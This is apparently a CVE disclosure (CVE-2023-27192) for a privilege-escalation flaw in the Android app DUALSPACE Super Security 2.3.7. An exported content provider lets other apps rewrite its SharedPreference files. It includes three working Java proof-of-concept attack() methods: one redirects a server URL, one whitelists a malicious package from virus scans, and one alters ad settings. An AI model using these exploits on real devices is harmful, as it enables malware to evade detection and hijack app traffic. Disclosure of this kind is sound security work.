Escalation of Privileges exists in Super Security (CVE-2023-27192)

Vendor: DUALSPACE (http://www.dualspace.com/pc/en/products.html)

Affected product: Super Security (com.ludashi.security)

Version: 2.3.7

Download link: https://apkpure.com/cn/super-security-virus-cleaner/com.ludashi.security

Description of the vulnerability for use in the CVE: An issue found in DUALSPACE Super Security v.2.3.7 allows an attacker to gain privileges via the SharedPreference files.

Additional information: The app is a security application that provides several security-related functions. Upon opening, the app loads the SharedPreference files into memory and uses the data in some important functions. If a malicious app modifies important data in the SharedPreference files, the Super Security app will not behave properly when loading this data. This can cause many security hazards, such as controlling the server URL the victim app is going to access (by modifying the key_wifi_safe_net_check_url field), allowing malicious apps to add themselves to the virus check whitelist (by modifying the KEY_VIRUS_SCAN_WHITELIST field), ad blocking (by modifying the key_ad_new_user_avoid_time field), and more. Even worse, users cannot fix the security issue by rebooting victim devices, since the injected data is persistent in the SharedPreference files.

1. Controlling the server URL the victim app is going to access:

PoC:

public void attack() {
    ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
    Uri uri = Uri.parse("content://com.ludashi.security.SharedPrefProvider");
    ContentValues contentValues = new ContentValues();
    contentValues.put("file_name","__default__");
    contentValues.put("type",4);
    contentValues.put("key","key_wifi_safe_net_check_url");
    contentValues.put("value","www.xxx.com");
    contentResolver.update(uri, contentValues,null,null);
}

2. Allowing malicious apps to add themselves to the virus scan whitelist:

PoC:

public void attack() {
    ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
    Uri uri = Uri.parse("content://com.ludashi.security.SharedPrefProvider");
    ContentValues contentValues = new ContentValues();
    contentValues.put("file_name","__default__");
    contentValues.put("type",4);
    contentValues.put("key","KEY_VIRUS_SCAN_WHITELIST");
    contentValues.put("value","xxx.packagename");
    contentResolver.update(uri, contentValues,null,null);
}

[Screenshot: KEY_VIRUS_SCAN_WHITELIST field]

3. Ad blocking:

PoC:

public void attack() {
    ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
    Uri uri = Uri.parse("content://com.ludashi.security.SharedPrefProvider");
    ContentValues contentValues = new ContentValues();
    contentValues.put("file_name","__default__");
    contentValues.put("type",2);
    contentValues.put("key","key_ad_new_user_avoid_time");
    contentValues.put("value","100000");
    contentResolver.update(uri, contentValues,null,null);
}

[Screenshot: key_ad_new_user_avoid_time field]